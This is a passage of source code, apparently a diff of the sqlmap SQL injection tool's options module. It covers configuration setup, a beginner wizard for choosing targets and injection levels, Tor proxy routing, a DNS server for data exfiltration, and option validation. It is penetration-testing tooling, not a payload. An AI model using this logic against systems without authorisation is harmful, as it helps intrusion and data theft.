conf.dumpFormat: + conf.dumpFormat = conf.dumpFormat.upper() + + if conf.torType: + conf.torType = conf.torType.upper() + + if conf.col: + conf.col = re.sub(r"\s*,\s*", ',', conf.col) + + if conf.exclude: + regex = False + original = conf.exclude + + if any(_ in conf.exclude for _ in ('+', '*')): + try: + re.compile(conf.exclude) + except re.error: + pass + else: + regex = True + + if not regex: + conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude) + conf.exclude = r"\A%s\Z" % '|'.join(re.escape(_) for _ in conf.exclude.split(',')) + else: + conf.exclude = re.sub(r"(\w+)\$", r"\g<1>\$", conf.exclude) + + class _(six.text_type): + pass + + conf.exclude = _(conf.exclude) + conf.exclude._original = original + + if conf.binaryFields: + conf.binaryFields = conf.binaryFields.replace(" ", "") + conf.binaryFields = re.split(PARAMETER_SPLITTING_REGEX, conf.binaryFields) + + envProxy = max(os.environ.get(_, "") for _ in PROXY_ENVIRONMENT_VARIABLES) + if re.search(r"\A(https?|socks[45])://.+:\d+\Z", envProxy) and conf.proxy is None: + debugMsg = "using environment proxy '%s'" % envProxy + logger.debug(debugMsg) + + conf.proxy = envProxy + + if any((conf.proxy, conf.proxyFile, conf.tor)): + conf.disablePrecon = True + + if conf.dummy: + conf.batch = True + + threadData = getCurrentThreadData() + threadData.reset() + +def _cleanupEnvironment(): + """ + Cleanup environment (e.g. from leftovers after --shell). + """ + + if issubclass(_http_client.socket.socket, socks.socksocket): + socks.unwrapmodule(_http_client) + + if hasattr(socket, "_ready"): + socket._ready.clear() + +def _purge(): + """ + Safely removes (purges) sqlmap data directory. + """ + + if conf.purge: + purge(paths.SQLMAP_HOME_PATH) + +def _setConfAttributes(): + """ + This function set some needed attributes into the configuration + singleton. + """ + + debugMsg = "initializing the configuration" + logger.debug(debugMsg) + + conf.authUsername = None + conf.authPassword = None + conf.boundaries = [] + conf.cj = None + conf.dbmsConnector = None + conf.dbmsHandler = None + conf.dnsServer = None + conf.dumpPath = None + conf.hashDB = None + conf.hashDBFile = None + conf.httpCollector = None + conf.httpHeaders = [] + conf.hostname = None + conf.ipv6 = False + conf.multipleTargets = False + conf.outputPath = None + conf.paramDict = {} + conf.parameters = {} + conf.path = None + conf.port = None + conf.proxyList = None + conf.resultsFP = None + conf.scheme = None + conf.tests = [] + conf.trafficFP = None + conf.HARCollectorFactory = None + conf.fileWriteType = None + +def _setKnowledgeBaseAttributes(flushAll=True): + """ + This function set some needed attributes into the knowledge base + singleton. + """ + + debugMsg = "initializing the knowledge base" + logger.debug(debugMsg) + + kb.absFilePaths = set() + kb.adjustTimeDelay = None + kb.alerted = False + kb.aliasName = randomStr() + kb.alwaysRefresh = None + kb.arch = None + kb.authHeader = None + kb.bannerFp = AttribDict() + kb.base64Originals = {} + kb.binaryField = False + kb.browserVerification = None + + kb.brute = AttribDict({"tables": [], "columns": []}) + kb.bruteMode = False + + kb.cache = AttribDict() + kb.cache.addrinfo = {} + kb.cache.content = {} + kb.cache.comparison = {} + kb.cache.encoding = {} + kb.cache.alphaBoundaries = None + kb.cache.hashRegex = None + kb.cache.intBoundaries = None + kb.cache.parsedDbms = {} + kb.cache.regex = {} + kb.cache.stdev = {} + + kb.captchaDetected = None + + kb.chars = AttribDict() + kb.chars.delimiter = randomStr(length=6, lowercase=True) + kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True)) + + kb.choices = AttribDict(keycheck=False) + kb.codePage = None + kb.commonOutputs = None + kb.connErrorCounter = 0 + kb.copyExecTest = None + kb.counters = {} + kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR + kb.data = AttribDict() + kb.dataOutputFlag = False + + # Active back-end DBMS fingerprint + kb.dbms = None + kb.dbmsFilter = [] + kb.dbmsVersion = [UNKNOWN_DBMS_VERSION] + + kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] + kb.dep = None + kb.disableHtmlDecoding = False + kb.disableShiftTable = False + kb.dnsMode = False + kb.dnsTest = None + kb.docRoot = None + kb.droppingRequests = False + kb.dumpColumns = None + kb.dumpTable = None + kb.dumpKeyboardInterrupt = False + kb.dynamicMarkings = [] + kb.dynamicParameter = False + kb.endDetection = False + kb.explicitSettings = set() + kb.extendTests = None + kb.errorChunkLength = None + kb.errorIsNone = True + kb.falsePositives = [] + kb.fileReadMode = False + kb.fingerprinted = False + kb.followSitemapRecursion = None + kb.forcedDbms = None + kb.forcePartialUnion = False + kb.forceThreads = None + kb.forceWhere = None + kb.forkNote = None + kb.futileUnion = None + kb.fuzzUnionTest = None + kb.heavilyDynamic = False + kb.headersFile = None + kb.headersFp = {} + kb.heuristicDbms = None + kb.heuristicExtendedDbms = None + kb.heuristicCode = None + kb.heuristicMode = False + kb.heuristicPage = False + kb.heuristicTest = None + kb.hintValue = "" + kb.htmlFp = [] + kb.httpErrorCodes = {} + kb.inferenceMode = False + kb.ignoreCasted = None + kb.ignoreNotFound = False + kb.ignoreTimeout = False + kb.identifiedWafs = set() + kb.injection = InjectionDict() + kb.injections = [] + kb.jsonAggMode = False + kb.laggingChecked = False + kb.lastParserStatus = None + + kb.locks = AttribDict() + for _ in ("cache", "connError", "count", "handlers", "hint", "identYwaf", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): + kb.locks[_] = threading.Lock() + + kb.matchRatio = None + kb.maxConnectionsFlag = False + kb.mergeCookies = None + kb.multiThreadMode = False + kb.multipleCtrlC = False + kb.negativeLogic = False + kb.nchar = True + kb.nullConnection = None + kb.oldMsf = None + kb.orderByColumns = None + kb.originalCode = None + kb.originalPage = None + kb.originalPageTime = None + kb.originalTimeDelay = None + kb.originalUrls = dict() + + # Back-end DBMS underlying operating system fingerprint via banner (-b) + # parsing + kb.os = None + kb.osVersion = None + kb.osSP = None + + kb.pageCompress = True + kb.pageTemplate = None + kb.pageTemplates = dict() + kb.pageEncoding = DEFAULT_PAGE_ENCODING + kb.pageStable = None + kb.partRun = None + kb.permissionFlag = False + kb.place = None + kb.postHint = None + kb.postSpaceToPlus = False + kb.postUrlEncode = True + kb.prependFlag = False + kb.processResponseCounter = 0 + kb.previousMethod = None + kb.processNonCustom = None + kb.processUserMarks = None + kb.proxyAuthHeader = None + kb.queryCounter = 0 + kb.randomPool = {} + kb.reflectiveMechanism = True + kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} + kb.requestCounter = 0 + kb.resendPostOnRedirect = None + kb.resolutionDbms = None + kb.responseTimes = {} + kb.responseTimeMode = None + kb.responseTimePayload = None + kb.resumeValues = True + kb.safeCharEncode = False + kb.safeReq = AttribDict() + kb.secondReq = None + kb.serverHeader = None + kb.singleLogFlags = set() + kb.skipSeqMatcher = False + kb.smokeMode = False + kb.reduceTests = None + kb.sslSuccess = False + kb.startTime = time.time() + kb.stickyDBMS = False + kb.suppressResumeInfo = False + kb.tableFrom = None + kb.technique = None + kb.tempDir = None + kb.testMode = False + kb.testOnlyCustom = False + kb.testQueryCount = 0 + kb.testType = None + kb.threadContinue = True + kb.threadException = False + kb.uChar = NULL + kb.udfFail = False + kb.unionDuplicates = False + kb.unionTemplate = None + kb.webSocketRecvCount = None + kb.wizardMode = False + kb.xpCmdshellAvailable = False + + if flushAll: + kb.checkSitemap = None + kb.headerPaths = {} + kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) + kb.lastCtrlCTime = None + kb.normalizeCrawlingChoice = None + kb.passwordMgr = None + kb.postprocessFunctions = [] + kb.preprocessFunctions = [] + kb.skipVulnHost = None + kb.storeCrawlingChoice = None + kb.tamperFunctions = [] + kb.targets = OrderedSet() + kb.testedParams = set() + kb.userAgents = None + kb.vainRun = True + kb.vulnHosts = set() + kb.wafFunctions = [] + kb.wordlists = None + +def _useWizardInterface(): + """ + Presents simple wizard interface for beginner users + """ + + if not conf.wizard: + return + + logger.info("starting wizard interface") + + while not conf.url: + message = "Please enter full target URL (-u): " + conf.url = readInput(message, default=None, checkBatch=False) + + message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + conf.data = readInput(message, default=None) + + if not (any('=' in _ for _ in (conf.url, conf.data)) or '*' in conf.url): + warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). " + if not conf.crawlDepth and not conf.forms: + warnMsg += "Will search for forms" + conf.forms = True + logger.warning(warnMsg) + + choice = None + + while choice is None or choice not in ("", "1", "2", "3"): + message = "Injection difficulty (--level/--risk). Please choose:\n" + message += "[1] Normal (default)\n[2] Medium\n[3] Hard" + choice = readInput(message, default='1') + + if choice == '2': + conf.risk = 2 + conf.level = 3 + elif choice == '3': + conf.risk = 3 + conf.level = 5 + else: + conf.risk = 1 + conf.level = 1 + + if not conf.getAll: + choice = None + + while choice is None or choice not in ("", "1", "2", "3"): + message = "Enumeration (--banner/--current-user/etc). Please choose:\n" + message += "[1] Basic (default)\n[2] Intermediate\n[3] All" + choice = readInput(message, default='1') + + if choice == '2': + options = WIZARD.INTERMEDIATE + elif choice == '3': + options = WIZARD.ALL + else: + options = WIZARD.BASIC + + for _ in options: + conf.__setitem__(_, True) + + logger.debug("muting sqlmap.. it will do the magic for you") + conf.verbose = 0 + + conf.batch = True + conf.threads = 4 + + dataToStdout("\nsqlmap is running, please wait..\n\n") + + kb.wizardMode = True + +def _saveConfig(): + """ + Saves the command line options to a sqlmap configuration INI file + Format. + """ + + if not conf.saveConfig: + return + + debugMsg = "saving command line options to a sqlmap configuration INI file" + logger.debug(debugMsg) + + saveConfig(conf, conf.saveConfig) + + infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig + logger.info(infoMsg) + +def setVerbosity(): + """ + This function set the verbosity of sqlmap output messages. + """ + + if conf.verbose is None: + conf.verbose = 1 + + conf.verbose = int(conf.verbose) + + if conf.verbose == 0: + logger.setLevel(logging.ERROR) + elif conf.verbose == 1: + logger.setLevel(logging.INFO) + elif conf.verbose > 2 and conf.eta: + conf.verbose = 2 + logger.setLevel(logging.DEBUG) + elif conf.verbose == 2: + logger.setLevel(logging.DEBUG) + elif conf.verbose == 3: + logger.setLevel(CUSTOM_LOGGING.PAYLOAD) + elif conf.verbose == 4: + logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT) + elif conf.verbose >= 5: + logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) + +def _normalizeOptions(inputOptions): + """ + Sets proper option types + """ + + types_ = {} + for group in optDict.keys(): + types_.update(optDict[group]) + + for key in inputOptions: + if key in types_: + value = inputOptions[key] + if value is None: + continue + + type_ = types_[key] + if type_ and isinstance(type_, tuple): + type_ = type_[0] + + if type_ == OPTION_TYPE.BOOLEAN: + try: + value = bool(value) + except (TypeError, ValueError): + value = False + elif type_ == OPTION_TYPE.INTEGER: + try: + value = int(value) + except (TypeError, ValueError): + value = 0 + elif type_ == OPTION_TYPE.FLOAT: + try: + value = float(value) + except (TypeError, ValueError): + value = 0.0 + + inputOptions[key] = value + +def _mergeOptions(inputOptions, overrideOptions): + """ + Merge command line options with configuration file and default options. + + @param inputOptions: optparse object with command line options. + @type inputOptions: C{instance} + """ + + if inputOptions.configFile: + configFileParser(inputOptions.configFile) + + if hasattr(inputOptions, "items"): + inputOptionsItems = inputOptions.items() + else: + inputOptionsItems = inputOptions.__dict__.items() + + for key, value in inputOptionsItems: + if key not in conf or value not in (None, False) or overrideOptions: + conf[key] = value + + if not conf.api: + for key, value in conf.items(): + if value is not None: + kb.explicitSettings.add(key) + + for key, value in defaults.items(): + if hasattr(conf, key) and conf[key] is None: + conf[key] = value + + if conf.unstable: + if key in ("timeSec", "retries", "timeout"): + conf[key] *= 2 + + if conf.unstable: + conf.forcePartial = True + + lut = {} + for group in optDict.keys(): + lut.update((_.upper(), _) for _ in optDict[group]) + + envOptions = {} + for key, value in os.environ.items(): + if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() + if _ in lut: + envOptions[lut[_]] = value + + if envOptions: + _normalizeOptions(envOptions) + for key, value in envOptions.items(): + conf[key] = value + + mergedOptions.update(conf) + +def _setTrafficOutputFP(): + if conf.trafficFile: + infoMsg = "setting file for logging HTTP traffic" + logger.info(infoMsg) + + conf.trafficFP = openFile(conf.trafficFile, "w+") + +def _setupHTTPCollector(): + if not conf.harFile: + return + + conf.httpCollector = HTTPCollectorFactory(conf.harFile).create() + +def _setDNSServer(): + if not conf.dnsDomain: + return + + infoMsg = "setting up DNS server instance" + logger.info(infoMsg) + + isAdmin = runningAsAdmin() + + if isAdmin: + try: + conf.dnsServer = DNSServer() + conf.dnsServer.run() + except socket.error as ex: + errMsg = "there was an error while setting up " + errMsg += "DNS server instance ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + else: + errMsg = "you need to run sqlmap as an administrator " + errMsg += "if you want to perform a DNS data exfiltration attack " + errMsg += "as it will need to listen on privileged UDP port 53 " + errMsg += "for incoming address resolution attempts" + raise SqlmapMissingPrivileges(errMsg) + +def _setProxyList(): + if not conf.proxyFile: + return + + conf.proxyList = [] + for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)): + _, type_, address, port = match.groups() + conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) + +def _setTorProxySettings(): + if not conf.tor: + return + + if conf.torType == PROXY_TYPE.HTTP: + _setTorHttpProxySettings() + else: + _setTorSocksProxySettings() + +def _setTorHttpProxySettings(): + infoMsg = "setting Tor HTTP proxy settings" + logger.info(infoMsg) + + port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)) + + if port: + conf.proxy = "http://%s:%d" % (LOCALHOST, port) + else: + errMsg = "can't establish connection with the Tor HTTP proxy. " + errMsg += "Please make sure that you have Tor (bundle) installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + raise SqlmapConnectionException(errMsg) + + if not conf.checkTor: + warnMsg = "use switch '--check-tor' at " + warnMsg += "your own convenience when accessing " + warnMsg += "Tor anonymizing network because of " + warnMsg += "known issues with default settings of various 'bundles' " + warnMsg += "(e.g. Vidalia)" + logger.warning(warnMsg) + +def _setTorSocksProxySettings(): + infoMsg = "setting Tor SOCKS proxy settings" + logger.info(infoMsg) + + port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,)) + + if not port: + errMsg = "can't establish connection with the Tor SOCKS proxy. " + errMsg += "Please make sure that you have Tor service installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + raise SqlmapConnectionException(errMsg) + + # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port) + socks.wrapmodule(_http_client) + +def _setHttpChunked(): + if conf.chunked and conf.data: + if hasattr(_http_client.HTTPConnection, "_set_content_length"): + _http_client.HTTPConnection._set_content_length = lambda self, *args, **kwargs: None + else: + def putheader(self, header, *values): + if header != HTTP_HEADER.CONTENT_LENGTH: + self._putheader(header, *values) + + if not hasattr(_http_client.HTTPConnection, "_putheader"): + _http_client.HTTPConnection._putheader = _http_client.HTTPConnection.putheader + + _http_client.HTTPConnection.putheader = putheader + +def _checkWebSocket(): + if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): + try: + from websocket import ABNF + except ImportError: + errMsg = "sqlmap requires third-party module 'websocket-client' " + errMsg += "in order to use WebSocket functionality" + raise SqlmapMissingDependence(errMsg) + +def _checkTor(): + if not conf.checkTor: + return + + infoMsg = "checking Tor connection" + logger.info(infoMsg) + + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + except SqlmapConnectionException: + page = None + + if not page or "Congratulations" not in page: + errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" + raise SqlmapConnectionException(errMsg) + else: + infoMsg = "Tor is properly being used" + logger.info(infoMsg) + +def _basicOptionValidation(): + if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0): + errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)" + raise SqlmapSyntaxException(errMsg) + + if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0): + errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" + raise SqlmapSyntaxException(errMsg) + + if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5): + errMsg = "value for option '--level' must be an integer value from range [1, 5]" + raise SqlmapSyntaxException(errMsg) + + if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3): + errMsg = "value for option '--risk' must be an integer value from range [1, 3]" + raise SqlmapSyntaxException(errMsg) + + if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ + isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: + warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable" + logger.warning(warnMsg) + + if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ + isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: + errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" + raise SqlmapSyntaxException(errMsg) + + if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)): + warnMsg = "usage of switch '--random-agent' is strongly recommended when " + warnMsg += "using option '--proxy-file'" + logger.warning(warnMsg) + + if conf.textOnly and conf.nullConnection: + errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.uValues and conf.uChar: + errMsg = "option '--union-values' is incompatible with option '--union-char'" + raise SqlmapSyntaxException(errMsg) + + if conf.base64Parameter and conf.tamper: + errMsg = "option '--base64' is incompatible with option '--tamper'" + raise SqlmapSyntaxException(errMsg) + + if conf.eta and conf.verbose > defaults.verbose: + errMsg = "switch '--eta' is incompatible with option '-v'" + raise SqlmapSyntaxException(errMsg) + + if conf.secondUrl and conf.secondReq: + errMsg = "option '--second-url' is incompatible with option '--second-req')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.url: + errMsg = "option '-d' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.dbms: + errMsg = "option '-d' is incompatible with option '--dbms'" + raise SqlmapSyntaxException(errMsg) + + if conf.titles and conf.nullConnection: + errMsg = "switch '--titles' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.dumpTable and conf.search: + errMsg = "switch '--dump' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + + if conf.chunked and not any((conf.data, conf.requestFile, conf.forms)): + errMsg = "switch '--chunked' requires usage of (POST) options/switches '--data', '-r' or '--forms'" + raise SqlmapSyntaxException(errMsg) + + if conf.api and not conf.configFile: + errMsg = "switch '--api' requires usage of option '-c'" + raise SqlmapSyntaxException(errMsg) + + if conf.data and conf.nullConnection: + errMsg = "option '--data' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.string and conf.nullConnection: + errMsg = "option '--string' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.notString and conf.nullConnection: + errMsg = "option '--not-string' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.tor and conf.osPwn: + errMsg = "option '--tor' is incompatible with switch '--os-pwn'" + raise SqlmapSyntaxException(errMsg) + + if conf.noCast and conf.hexConvert: + errMsg = "switch '--no-cast' is incompatible with switch '--hex'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlDepth: + try: + xrange(conf.crawlDepth) + except OverflowError as ex: + errMsg = "invalid value used for option '--crawl' ('%s')" % getSafeExString(ex) + raise SqlmapSyntaxException(errMsg) + + if conf.dumpAll and conf.search: + errMsg = "switch '--dump-all' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + + if conf.string and conf.notString: + errMsg = "option '--string' is incompatible with switch '--not-string'" + raise SqlmapSyntaxException(errMsg) + + if conf.regexp and conf.nullConnection: + errMsg = "option '--regexp' is incompatible with switch '--null-connection'" + raise SqlmapSyntaxException(errMsg) + + if conf.regexp: + try: + re.compile(conf.regexp) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.paramExclude: + if re.search(r"\A\w+,", conf.paramExclude): + conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(','))) + + try: + re.compile(conf.paramExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.paramExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retryOn: + try: + re.compile(conf.retryOn) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retries == defaults.retries: + conf.retries = 5 * conf.retries + + warnMsg = "increasing default value for " + warnMsg += "option '--retries' to %d because " % conf.retries + warnMsg += "option '--retry-on' was provided" + logger.warning(warnMsg) + + + if conf.cookieDel and len(conf.cookieDel) != 1: + errMsg = "option '--cookie-del' should contain a single character (e.g. ';')" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude: + try: + re.compile(conf.crawlExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.scope: + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.dumpTable and conf.dumpAll: + errMsg = "switch '--dump' is incompatible with switch '--dump-all'" + raise SqlmapSyntaxException(errMsg) + + if conf.predictOutput and (conf.threads > 1 or conf.optimize): + errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" + raise SqlmapSyntaxException(errMsg) + + if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"): + errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS + raise SqlmapSyntaxException(errMsg) + + if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile)): + errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g' or '-m'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude and not conf.crawlDepth: + errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'" + raise SqlmapSyntaxException(errMsg) + + if conf.safePost and not conf.safeUrl: + errMsg = "option '--safe-post' requires usage of option '--safe-url'" + raise SqlmapSyntaxException(errMsg) + + if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)): + errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'" + raise SqlmapSyntaxException(errMsg) + + if conf.safeReqFile and any((conf.safeUrl, conf.safePost)): + errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfUrl and not conf.csrfToken: + errMsg = "option '--csrf-url' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfMethod and not conf.csrfToken: + errMsg = "option '--csrf-method' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfData and not conf.csrfToken: + errMsg = "option '--csrf-data' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfToken and conf.threads > 1: + errMsg = "option '--csrf-url' is incompatible with option '--threads'" + raise SqlmapSyntaxException(errMsg) + + if conf.requestFile and conf.url and conf.url != DUMMY_URL: + errMsg = "option '-r' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.proxy: + errMsg = "option '-d' is incompatible with option '--proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.tor: + errMsg = "option '-d' is incompatible with switch '--tor'" + raise SqlmapSyntaxException(errMsg) + + if not conf.technique: + errMsg = "option '--technique' can't be empty" + raise SqlmapSyntaxException(errMsg) + + if conf.tor and conf.ignoreProxy: + errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.tor and conf.proxy: + errMsg = "switch '--tor' is incompatible with option '--proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + + if conf.proxyFreq and not conf.proxyFile: + errMsg = "option '--proxy-freq' requires usage of option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + + if conf.checkTor and not any((conf.tor, conf.proxy)): + errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)" + raise SqlmapSyntaxException(errMsg) + + if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): + errMsg = "value for option '--tor-port' must be in range [0, 65535]" + raise SqlmapSyntaxException(errMsg) + + if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): + errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True)) + raise SqlmapSyntaxException(errMsg) + + if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True): + errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) + raise SqlmapSyntaxException(errMsg) + + if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1): + errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position " + errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR + raise SqlmapSyntaxException(errMsg) + + if conf.skip and conf.testParameter: + if intersect(conf.skip, conf.testParameter): + errMsg = "option '--skip' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + + if conf.rParam and conf.testParameter: + if intersect(conf.rParam, conf.testParameter): + errMsg = "option '--randomize' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + + if conf.mobile and conf.agent: + errMsg = "switch '--mobile' is incompatible with option '--user-agent'" + raise SqlmapSyntaxException(errMsg) + + if conf.proxy and conf.ignoreProxy: + errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.alert and conf.alert.startswith('-'): + errMsg = "value for option '--alert' must be valid operating system command(s)" + raise SqlmapSyntaxException(errMsg) + + if conf.timeSec < 1: + errMsg = "value for option '--time-sec' must be a positive integer" + raise SqlmapSyntaxException(errMsg) + + if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)): + errMsg = "option '--crack' should be used as a standalone" + raise SqlmapSyntaxException(errMsg) + + if isinstance(conf.uCols, six.string_types): + if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): + errMsg = "value for option '--union-cols' must be a range with hyphon " + errMsg += "(e.g. 1-10) or integer value (e.g. 5)" + raise SqlmapSyntaxException(errMsg) + + if conf.dbmsCred and ':' not in conf.dbmsCred: + errMsg = "value for option '--dbms-cred' must be in " + errMsg += "format : (e.g. \"root:pass\")" + raise SqlmapSyntaxException(errMsg) + + if conf.encoding: + _ = checkCharEncoding(conf.encoding, False) + if _ is None: + errMsg = "unknown encoding '%s'. Please visit " % conf.encoding + errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE + errMsg += "supported encodings" + raise SqlmapSyntaxException(errMsg) + else: + conf.encoding = _ + + if conf.fileWrite and not os.path.isfile(conf.fileWrite): + errMsg = "file '%s' does not exist" % os.path.abspath(conf.fileWrite) + raise SqlmapFilePathException(errMsg) + + if conf.loadCookies and not os.path.exists(conf.loadCookies): + errMsg = "cookies file '%s' does not exist" % os.path.abspath(conf.loadCookies) + raise SqlmapFilePathException(errMsg) + +def initOptions(inputOptions=AttribDict(), overrideOptions=False): + _setConfAttributes() + _setKnowledgeBaseAttributes() + _mergeOptions(inputOptions, overrideOptions) + +def init(): + """ + Set attributes into both configuration and knowledge base singletons + based upon command line and configuration file options. + """ + + _useWizardInterface() + setVerbosity() + _saveConfig() + _setRequestFromFile() + _cleanupOptions() + _cleanupEnvironment() + _purge() + _checkDependencies() + _createHomeDirectories() + _createTemporaryDirectory() + _basicOptionValidation() + _setProxyList() + _setTorProxySettings() + _setDNSServer() + _adjustLoggingFormatter() + _setMultipleTargets() + _listTamperingFunctions() + 